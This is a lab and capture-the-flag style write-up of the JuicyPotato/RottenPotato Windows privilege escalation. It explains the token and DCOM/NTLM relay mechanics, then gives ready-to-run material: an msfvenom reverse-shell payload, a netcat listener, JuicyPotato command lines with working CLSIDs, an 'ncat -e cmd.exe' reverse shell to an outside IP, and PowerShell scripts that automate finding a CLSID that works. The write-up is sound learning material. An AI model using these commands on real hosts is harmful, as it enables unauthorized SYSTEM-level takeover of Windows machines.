JuicyPotato/RottenPotato

Short Summary

If a user account you control holds the SeImpersonatePrivilege (which most service accounts, such as IIS and SQL Server identities, have), then you can get a SYSTEM shell.

Note: This technique was effectively patched in Windows 10 1809 and Windows Server 2019 (build 17763): the DCOM activation no longer calls back to an attacker-chosen local port, so JuicyPotato/RottenPotato fail there. RoguePotato came out afterwards and works on those builds by pointing the OXID resolver at a host the attacker controls. SweetPotato combines the various *Potato variants into a single binary for easy exploitation.

Explanation

Requirements

If your user has the SeImpersonatePrivilege or SeAssignPrimaryTokenPrivilege, then you are effectively SYSTEM. Normal users don't usually have these, but service accounts (IIS application pools, SQL Server, scheduled-task identities) often do. You can check with whoami /priv, or with whoami /all under "Privileges"; the privilege only needs to be present, its Enabled/Disabled state does not matter.

You also need to be able to activate a DCOM server (identified by its CLSID) which:

  1. implements the IMarshal interface, so that activating it with a marshalled IStorage makes it connect back to an endpoint you choose

  2. runs as an elevated account (SYSTEM, an administrator, or another local service identity worth having)

RottenPotato hard-coded the BITS service as the DCOM server and listened on local port 6666 for the callback. JuicyPotato generalizes this: you pick the CLSID (-c) and the listener port (-l), so if BITS is disabled or that port is blocked there are other services to try.
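The following PowerShell is an added pre-flight check for the requirements above; it is not part of the original write-up or of the JuicyPotato project. It reports whether the current token carries either privilege, whether the OS build is older than the 1809/2019 fix, and which registered COM classes are hosted by a Windows service (and under which account), which is where the useful CLSIDs come from. The registry layout it reads (the AppID value under HKCR\CLSID\{clsid} and the LocalService value under HKCR\AppID\{appid}) is standard; treat the resulting list as candidates to test, not as a guarantee that a CLSID will work.

```powershell
# Added example: pre-flight checks for JuicyPotato/RottenPotato on the target host.
# Run from the low-privileged shell you already have.

# 1. Token privileges: either one is enough.
$privs  = whoami /priv
$wanted = 'SeImpersonatePrivilege', 'SeAssignPrimaryTokenPrivilege'
$have   = $wanted | Where-Object { $privs -match $_ }
if ($have) {
    "[+] Privileges present: $($have -join ', ')"
} else {
    "[-] Neither SeImpersonatePrivilege nor SeAssignPrimaryTokenPrivilege; JuicyPotato will not work from this account."
}

# 2. OS build: Windows 10 1809 and Server 2019 are build 17763; from there on the
#    local DCOM callback is blocked and you need RoguePotato or a similar newer variant.
$build = [int](Get-CimInstance Win32_OperatingSystem).BuildNumber
if ($build -lt 17763) {
    "[+] Build $build is older than 1809/2019; JuicyPotato/RottenPotato should apply."
} else {
    "[-] Build $build is 1809/2019 or newer; expect JuicyPotato to fail, try RoguePotato."
}

# 3. Candidate CLSIDs: COM classes whose AppID is hosted by a service (LocalService value),
#    joined with the account that service runs as (LocalSystem == NT AUTHORITY\SYSTEM).
$svcAccount = @{}
Get-CimInstance Win32_Service | ForEach-Object { $svcAccount[$_.Name] = $_.StartName }

$candidates = foreach ($cls in Get-ChildItem 'Registry::HKEY_CLASSES_ROOT\CLSID' -ErrorAction SilentlyContinue) {
    $appid = (Get-ItemProperty -Path $cls.PSPath -ErrorAction SilentlyContinue).AppID
    if (-not $appid) { continue }
    $app = Get-ItemProperty -Path "Registry::HKEY_CLASSES_ROOT\AppID\$appid" -ErrorAction SilentlyContinue
    if (-not $app -or -not $app.LocalService) { continue }
    [pscustomobject]@{
        CLSID   = $cls.PSChildName
        Service = $app.LocalService
        Account = $svcAccount[$app.LocalService]   # empty if the service is not installed
        RunAs   = $app.RunAs                       # explicit RunAs overrides the service identity
    }
}

# SYSTEM-hosted classes first; these are the ones worth feeding to JuicyPotato -c.
$candidates | Sort-Object { $_.Account -ne 'LocalSystem' }, Service | Format-Table -AutoSize
```

The enumeration is only a shortlist: whether a given class actually performs the callback that JuicyPotato needs still has to be confirmed by running the tool against it, which is why the published per-OS CLSID lists remain the quickest route.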

Tokens

Every process has an access token, which specifies which user it runs as and what kinds of actions it may take. With the right privileges, Windows allows a process to impersonate another token, either just to identify the other user or to perform actions on that user's behalf.

Impersonation tokens come in four levels, which for our purposes fall into two groups:

  • Impersonation/delegation level - these let you perform actions as the other user (delegation additionally works across the network).

  • Anonymous/identification level - only good for finding out who the other user is; they do not let you perform actions.

If you can obtain an impersonation-level (or delegation-level) token for SYSTEM, then you can perform actions as SYSTEM. A mere identification-level token is useless for this.

How It Works

How RottenPotato works at a high level:

  1. Trick the "NT AUTHORITY\SYSTEM" account into authenticating via NTLM to a TCP endpoint we control. This is done by activating a DCOM server that runs as SYSTEM (BITS in the original) with an IStorage object whose marshalled data points at our local listener, so the SYSTEM-owned COM runtime connects back to it.

  2. Man-in-the-middle this authentication attempt (a local NTLM relay): the NTLM messages coming from the SYSTEM connection are fed into a local authentication handshake via the Windows security APIs (AcquireCredentialsHandle/AcceptSecurityContext on one side, InitializeSecurityContext on the other), which ends with a security context, and hence a token, for "NT AUTHORITY\SYSTEM".

  3. Impersonate the token we have just negotiated and use it to spawn a process (CreateProcessWithTokenW or CreateProcessAsUser). This only works if the attacker's current account holds the privilege to impersonate security tokens, which is usually true of service accounts and not true of ordinary user accounts.

Exploitation

First of all, download the JuicyPotato executable. If the x64 release fails to run (for example because your current shell is a 32-bit process), try the x86 build.

You're going to need something for JuicyPotato to execute when it finishes successfully. For example, you could generate a reverse shell.

msfvenom -p windows/shell_reverse_tcp LHOST="10.10.14.20" LPORT=8002 -f exe > reverse.exe

Listen for the reverse shell on your machine:

nc -lnvp 8002

On the victim machine, execute juicypotato (in this case the x86 variant):

.\JuicyPotato.x86.exe -l 1337 -c "CLSID_HERE" -p C:\path\to\reverse.exe -t *

You're probably going to need to test multiple CLSIDs before you get a working one; which ones work depends on the Windows version. JuicyPotato ships with per-OS lists of CLSIDs to try, and its -z switch tests a CLSID and prints the token's user without launching anything.
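The loop below is an added helper, not part of the original post or of the JuicyPotato project: it runs JuicyPotato's test mode (-z) over a list of candidate CLSIDs, kills any attempt that hangs (a CLSID that never calls back leaves the tool waiting on its listener), and reports which ones yield a token for NT AUTHORITY\SYSTEM. It assumes JuicyPotato.x86.exe is in the current directory and that you paste your own CLSID list in; the three CLSIDs shown are just the ones mentioned on this page.

```powershell
# Added example: test candidate CLSIDs with JuicyPotato -z and report the SYSTEM ones.
$juicy = '.\JuicyPotato.x86.exe'
$port  = 1337                      # same listener port as in the commands on this page
$clsids = @(                       # replace with the list for the target's OS version
    '{4991d34b-80a1-4291-83b6-3328366b9097}',   # BITS, JuicyPotato's default
    '{4B635ECB-0887-4015-8CA6-D621362F98D1}',
    '{5B3E6773-3A99-4A3D-8096-7765DD11785C}'
)

function Test-JuicyClsid {
    param([string]$Clsid, [int]$TimeoutSec = 10)
    $log = [System.IO.Path]::GetTempFileName()
    # -z: only test the CLSID and print the token's user; -t/-p/-l are still mandatory.
    $p = Start-Process -FilePath $juicy `
        -ArgumentList "-z -l $port -t * -p C:\Windows\System32\cmd.exe -c $Clsid" `
        -NoNewWindow -RedirectStandardOutput $log -PassThru
    if (-not $p.WaitForExit($TimeoutSec * 1000)) {
        $p.Kill()                  # no callback from this CLSID; move on to the next one
    }
    $out = Get-Content $log -Raw -ErrorAction SilentlyContinue
    Remove-Item $log -ErrorAction SilentlyContinue
    [pscustomobject]@{
        CLSID  = $Clsid
        System = ($out -match 'NT AUTHORITY\\SYSTEM')
        Output = (($out -replace '\s+', ' ')).Trim()
    }
}

$results = foreach ($c in $clsids) { Test-JuicyClsid -Clsid $c }
$results | Format-Table -AutoSize

$winner = $results | Where-Object System | Select-Object -First 1
if ($winner) {
    "[+] Working CLSID: $($winner.CLSID)"
    "[+] Now run: $juicy -l $port -c `"$($winner.CLSID)`" -p C:\path\to\reverse.exe -t *"
} else {
    "[-] No CLSID returned a SYSTEM token; try another list or a different listener port."
}
```

Testing with -z first keeps the noisy part (spawning a reverse shell) for the one CLSID you know works; a CLSID that returns a token for a different service account (for example NT AUTHORITY\LOCAL SERVICE) still shows up in the Output column and may be worth a second look if SYSTEM is not on offer.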

For example, in the hackthebox "devel" machine, this was the successful exploit (my reverse.exe was in the inetpub/wwwroot directory):

.\JuicyPotato.x86.exe -l 1337 -c "{4B635ECB-0887-4015-8CA6-D621362F98D1}" -p C:\inetpub\wwwroot\reverse.exe -t *

Alternatively, instead of an msfvenom payload you can have JuicyPotato run cmd.exe with a statically linked ncat.exe that you have dropped on the box:

.\JuicyPotato.x86.exe -l 1337 -c "{5B3E6773-3A99-4A3D-8096-7765DD11785C}" -p c:\windows\system32\cmd.exe -a "/c C:\Users\Public\ncat.exe -e cmd.exe 10.10.14.17 8002" -t *
